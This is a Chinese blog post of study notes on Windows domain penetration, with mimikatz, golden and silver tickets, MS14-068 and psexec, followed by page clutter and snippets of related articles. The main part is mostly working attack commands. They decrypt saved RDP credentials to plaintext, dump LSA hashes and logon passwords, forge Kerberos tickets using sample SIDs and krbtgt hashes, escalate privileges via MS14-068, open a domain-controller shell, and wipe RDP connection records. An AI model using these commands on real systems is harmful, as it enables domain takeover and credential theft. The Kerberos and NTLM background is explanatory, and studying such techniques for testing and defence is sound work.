内网渗透-跨域环境渗透-1

最新推荐文章于 2024-07-21 11:00:00 发布
最新推荐文章于 2024-07-21 11:00:00 发布
阅读量799 收藏 9
点赞数 22
分类专栏: 内网渗透 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rx3225968517/article/details/136634690
版权

目录

smbclient工具

mimikatz工具

Kerbers协议

NTLM认证

hash传递攻击(PTH攻击)

黄金票据攻击

白银票据

MS14-068

smbclient工具

在linux里面连接远程windows共享目录,可以使用这个工具
​
第一种连接方式:smbclient -L 目标IP -U username -W domain
smbclient -L 目标IP -U username%password -W domain
​
第二种连接方式:smbclient //目标IP/tmp/ -U username -W domain
smbclient //目标IP/tmp -U username%password -W domain
mimikatz工具

1、输入cmdkey /list 查看本地连接rdp的记录
​
2、dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*   查看本地的 Credentials,可以得到认证路径以及key值
​
3、使用mimikatz工具
使用 mimikatz 
输入 dpapi::cred /in:认证路径\key值
​
4、我们这时候会得到可用信息,我们记录guidMasterKey值
​
5、mimikatz.exe "" privilege::debug"" ""sekurlsa::dpapi full"" exit>>存放路径
​
6、这时候,我们就得到了导出来的guidMasterKey值的一些加密信息,记录一下加密情况下的密文以及masterkey的值
​
7、进入mimikatz
执行命令:
dpapi::cred /in:认证路径\key值/masterkey:key值  
​
8、这时候我们就得到了明文密码!
 

 

尽量不要手动删除注册表
​
del Default.rdp  这个命令就可以删除rdp连接记录!
 

 

Kerbers协议
 

 

Kerbers协议是一个身份验证机制,常用于windows域内!Kerbers协议可以有效的防止密码被嗅探和重放攻击!
在所有的通信过程中都是使用加密机制的,可以有效防止中间人攻击
​
身份验证过程:
​
1、认证服务器(AS): 用户向AS发送身份验证请求。AS生成用于用户和服务之间通信的临时密钥(票据授予票据 - TGT)。
票据授予服务器(TGS): 用户使用TGT请求特定服务的票据。TGS验证用户,然后生成用于与所需服务通信的票据。
票据:
​
2、票据授予票据(TGT): 用户向AS请求TGT,它包含用户身份信息和加密密钥。
服务票据: 用户使用TGT向TGS请求服务票据,该票据允许用户与特定服务进行通信。
​
3、单点登录(SSO): 用户只需通过一次身份验证即可访问多个服务,而不必为每个服务都提供凭据。
​
4、安全通信: 所有通信都使用加密密钥进行加密,防止中间人攻击。
黄金白银票据:
黄金票据(通票):伪造TGT
白银票据(专票):伪造TGS
​
整个过程都要通过DC域服务器的验证!  首先认证TGT然后认证TGS!
 

NTLM认证
 

 

NTLM使用挑战-响应机制进行身份验证,通常用于局域网中的Windows系统间的身份验证
 

 

hash传递攻击(PTH攻击)
 

 

 

 

黄金票据攻击
 

 

 

 

 

总结:
​
1、想要获取到黄金票据就需要tgt和域控的sid!
whoami /all  可得到域控的sid,也可以用mimikatz
mimikatz.exe "privilege::debug" "lsadump::lsa /patch" exit > 1.txt
​
2、有了tgt和sid就可以利用mimikatz进行黄金票据的伪造了
mimikatz.exe "kerberos::golden /user:xyz /domain:xyz.com /sid:S-1-5-21-116212833-2811902251-1975316662/krbtgt:789b3d4352b5a603c97cbfaf4b9a1046/ptt" exit
​
3、利用psexec调用目标域控的cmd
psexec.exe \\域名.域 cmd.exe
 

 

白银票据
 

 

 

 

 

总结:
​
1、想要获取白银票据,需要满足三个条件;域控的IP、域控的sid、域控的hash。
域控的IP: ping 123.com(域)
域控的sid:mimikatz或者whoami /all
域控的hash: mimikatz
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit > 2.txt 
​
2、伪造白银票据
mimikatz.exe "kerberos::golden /user:xyz /domain:xyz.com /sid:s-1-5-21-2511895695-3322341454-56546430
/target:WIN-9JK4CNGD41.xy.com /service:cifs /rc4:02c93f06b80c1feb55df4bcf6551c66e /ptt" exit
​
3、清除票据
klist purge
 

 

MS14-068
 

 

 

 

 

 

 

 

 

总结:
这个漏洞MS14-068不需要域控的管理员hash,只需要域内普通用户权限即可!
​
1、获取当前用户的sid  whoami /all
​
2、使用MS14-068提权工具生成伪造的kerberos协议证书
MS14-068.exe -u <userName>@<domainName> -p <clearPassword>s <userSid>-d <domainControlerAddr>
===
ms14-068.exe -u xyz@cc.com -p 123.com-s S-1-5-21-2511895695-3322341454-56546430-1104-d WIN-9JJK4CNGD41.cc.com
​
3、使用mimikatz将伪造证书写入
mimikatz.exe"kerberos::ptc TGT_xy@cc.com.ccache" exit
​
4、使用psexec提权即可
psexec.exe \\WIN-9JJK4CNGD41.cc.com cmd.exe
 


                

        

        

    

  


    

      

        

            

              
                
                  真的学不了一点。。。
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
内网渗透-Windows内网渗透

				
			

			

				

					lza20001103的博客
				

				

					08-15
					
					1889
					
				

			

		

		

			
				
内网渗透-Windows内网渗透
文章目录内网渗透-Windows内网渗透前言一、信息收集1.1、SPN1.2、端口连接1.3、配置文件1.4、用户信息1.6、会话收集1.7、凭据收集navicat:SecureCRT:Xshell:WinSCP:VNC:1.8、DPAPI1.9、域信任1.10、域传送1.11、DNS记录获取1.12、WIFI1.13、GPP1.14、Seatbelt1.15、Bloodhound1.16、Exchange1.16.1 邮箱用户密码爆破1.16.3 信息收集二、传输通道2.

			
		

	



                

              
                



	

		

			

				
					
内网渗透(五十三)之域控安全和跨域攻击-利用域信任密钥获取目标域控

				
			

			

				

					把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
				

				

					02-24
					
					370
					
				

			

		

		

			
				
上传asktgs.exe和kirbikator.exe工具,asktgs.exe伪造票据,kirbikator.exe注入票据。使用mimikatz获取 当前域的 SID 父域的 SID 子域域管的NTLM 信任密钥。当前已经控制abc.hack.com域,其中包括 DC2机器和PC-2008-2机器。创建计划任务,如果拒绝访问,请注入host服务票据。创建CIFS服务的票据进行复制文件的操作。在普通的域内用户中创建创建高权限票据。伪造host服务,进行创建计划任务。这个是我们的恶意文件。

			
		

	



                


  
              

                


	

		

			

				
					
内网穿透-端口映射-跨域问题解决

				
			

			

				

					qq_39497997的博客
				

				

					08-10
					
					4628
					
				

			

		

		

			
				
内网穿透
server.port=80
跨域问题
@CrossOrigin



			
		

	





	

		

			

				
					
内网跨域渗透利用

				
			

			

				

					qq_18811919的博客
				

				

					03-16
					
					1402
					
				

			

		

		

			
				
本篇文章讲述了3种跨域利用方式以及跨域使用Adfind和bloodhound做侦查
	1.使用域间信任密钥进行跨域利用
	2.子域Krbtgt 密钥创建跨域金票
	3.打印机BUG/PetitPotam+非约束委派进行跨域利用

			
		

	



		

			
		



	

		

			

				
					
内网安全:PTH PTK PTT

					
最新发布

				
			

			

				

					qq_44005305的博客
				

				

					07-21
					
					1626
					
				

			

		

		

			
				
实验所用网络拓朴图网络环境说明​​​​​​​LM认证NTLM认证NTLM HashKerberos认证TGT票据服务票据Windows系统密码存储域控制器 - 用户登录 域用户 本地用户域用户和本地管理员用户登录Mimikatz抓取密码来源域内一台主机上可以得到非本地用户Hash的原因域横向移动:哈希传递攻击(PTH)- NTLM认证攻击PTH攻击原理利用方式一:Mimikatz利用方式二:Impacket利用方式三:CrackMapExec 密码喷射。

			
		

	





	

		

			

				
					
渗透-跨域攻击

				
			

			

				

					就是法老
				

				

					08-19
					
					1994
					
				

			

		

		

			
				
很多大型企业都拥有自己的内网,一般通过域林进行共享资源。根握不同职能区分的部门,从逻辑上以主域和子域进行划分,方便统一管理。在物理层,通常使用防火墙将各个子公司及各个部门划分为不同的区域。攻击者如果得到了某个子公司或者某个部门的域控制器权限,但没有得到整个公司的内网全部权限,往往会想办法获取其他部门或者域的权限。


》》》跨域攻击方法《《《

WEB漏洞:跨域获取权限
	PTH/PTT:DC本地管理员密码可能相同
	域信任关系:.......
》》》跨域攻击--域信任关系《《《

域信任的作用:解决多域.

			
		

	





	

		

			

				
					
跨域 ----细节的渗透

				
			

			

				

					weixin_35724834的博客
				

				

					08-29
					
					310
					
				

			

		

		

			
				
今天 时间8.29
  记录下成长的‘美地’事。。。。。。。。
 跨域问题
   今天做公司的车生活项目技术用的springboot支持前后端分离(不知手机端怎么做没研究过(^/^) ) 前端做跨域想着后台就不用跨域了(哎 菜比)
结果:被打脸最好的方法是前端做跨域后台也要做跨域【当然 做项目的时候springMVC 版本在4.0以上就可以在控制层也...

			
		

	





	

		

			

				
					
内网如何实现跨域

				
			

			

				

					Vdieoo的博客
				

				

					11-10
					
					2020
					
				

			

		

		

			
				
浅谈跨域——简单了解跨域的几种方式https://www.jianshu.com/p/9c9800337497?utm_campaign=maleskine&utm_content=note&utm_medium=seo_notes&utm_source=recommendation



内网如何实现跨域:


1.jsonp跨域		

利用了 script 不受同源策略的限制

缺点:只能 get 方式,易受到 XSS攻击

2.CORS跨域		

当使用XMLHttpRequ.

			
		

	





	

		

			

				
					
内网渗透之域渗透.pdf

				
			

			

				

					08-07
				

			

		

		

			
				
内网渗透和域渗透要求攻击者具备深入理解目标网络架构的能力,以及熟练掌握操作系统的各种命令和利用安全漏洞的方法。在实际操作中,攻击者通常会使用一系列标准化的步骤和技术手段来达成渗透目的,例如扫描网络资源...

			
		

	





	

		

			

				
					
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透

				
			

			

				

					aming小老弟
				

				

					12-21
					
					1276
					
				

			

		

		

			
				
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。

			
		

	





	

		

			

				
					
《内网安全攻防:渗透测试实战指南》读书笔记(七):跨域攻击分析及防御

				
			

			

				

					闵行小鱼塘
				

				

					04-19
					
					2870
					
				

			

		

		

			
				
本篇继续阅读学习《内网安全攻防:渗透测试实战指南》,本章是跨域攻击分析及防御,对利用域信任关系实现跨域攻击的典型方法进行了分析,并对如何部署安全的内网生产环境给出了建议,内容非常简短

			
		

	





	

		

			

				
					
网站建设学习(二)---内网穿透

				
			

			

				

					doctorKun
				

				

					11-17
					
					315
					
				

			

		

		

			
				
前提
什么是公网,私网,内网,外网?

私网:企业或者家庭用户搭建的网络,里面一般是私网IP。
公网:运营商搭建的网络。负责连接各个公司或者家庭的网络,里面网络一般为公网IP。

一般私网IP进入公网后,是没有路由的,会被丢弃,所以私网访问公网的话,需要SNAT(源地址转换,解决内网用户用同一个公网地址上网的问题。),把私网IP换成公网IP。

内网:可以简单理解为私网,不过这个概念是对于企业而言的,在企业内部叫私网,企业外部叫外网。
公网:从概念讲,是一个企业以外的网络,运营商的网络–公网,也可以包括其他

			
		

	





	

		

			

				
					
内网渗透-跨域环境渗透-2

				
			

			

				

					分享
				

				

					03-13
					
					426
					
				

			

		

		

			
				
内网渗透-跨域环境渗透-2。。。热土豆、Responder、WPAD、NTDS的利用。。。

			
		

	





	

		

			

				
					
前后端项目进行内网穿透

				
			

			

				

					weixin_42665577的博客
				

				

					03-07
					
					657
					
				

			

		

		

			
				
在本地开发环境中,你可以使用`cnpm run dev`来启动前端项目,使用Flask来启动后端项目。下面是一个简单的示例配置,假设前端项目运行在3000端口,后端项目运行在5000端口。以上配置假设你的域名为`your_domain.com`,并且前端项目的API请求路径以`/api/`开头。这样,当访问`http://your_domain.com`时,Nginx会将请求转发到前端项目,而访问`http://your_domain.com/api/`时,Nginx会将请求转发到后端项目。

			
		

	





	

		

			

				
					
渗透之PTH横向攻击

				
			

			

				

					qq_55202378的博客
				

				

					05-20
					
					231
					
				

			

		

		

			
				
命令行也可以连接RDP,上述指令可能连不成功。直接连接肯定不行,因为没有凭据。输入IP就行,不用输入密码。前提:RDP明文连接过。

			
		

	





	

		

			

				
					
NATAPP内网穿透方法

				
			

			

				

					David
				

				

					08-31
					
					2752
					
				

			

		

		

			
				
进入官网注册账号,并添加一个免得的通道,下载自己相对应的应用。(存储在你知道路径的文件中--等下有cmd命令有用)

打开cmd命令工具找到你下载的应用,使用cmd运行如下:

natapp.exe -authtoken=9ab6b9040a624f40


"=后面的一串" 是官网你创建的“我的隧道”里面的authtoken的值,复制过来就行了。






 红色地

			
		

	





	

		

			

				
					
内网渗透之如何批量PTH获取主机权限?

				
			

			

				

					2301_80115097的博客
				

				

					05-11
					
					328
					
				

			

		

		

			
				
其缔造者@byt3bl33d3r称,该工具的生存概念是,“利用AD内置功能/协议达成其功能,并规避大多数终端防护/IDS/IPS解决方案。声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。但如果你没有明文密码也没关系,用Mimikatz找到用户的hash,给他配置上去也可以批量探测hash。环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等。获取域密码策略:—pass-pol。

			
		

	





	

		

			

				
					
内网渗透之信息收集

				
			

			

				

					
				

				

					04-21
					
					331
					
				

			

		

		

			
				
简述

在通过各种方式拿到系统的shell之后,首先我们要苟住,现在稍微成规模的企业一般都开始注重安全,获取到shell的服务器上面极大可能安装着杀毒软件、主机安全agent等东西,不可妄动啊,万一引起管理员注意,好不容易拿下的权限可能就要丢失了;而且进行内网扫描之类的会被内网流量检测之类的设备发现,所以我们首先进行一波信息收集。看很多大佬都说内网渗透的本质是信息收集。

很多东西不能只知道有这么回事,连目的都不晓得真是没有深入进行学习。目前笔者的实力还是很有欠缺的,只能尽量的根据先行者的脚步进行学习,并根

			
		

	





	

		

			

				
					
复现MS14-068

				
			

			

				

					这里是Y.lin的博客,你好,很高兴云里相遇!希望能给你提供一点帮助
				

				

					05-23
					
					781
					
				

			

		

		

			
				
MS14-068

			
		

	





	

		

			

				
					
内网渗透实战指南:发现与控制域环境风险

				
			

			

				

					
				

			

		

		

			
				
内网渗透讲义深入探讨了在信息技术领域中,特别是在Windows网络环境中,内网渗透的重要性和方法。内网,或称局域网(LAN),是一种在特定地理范围内,如办公室或企业内部,通过网络连接多台计算机的封闭型网络。它...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值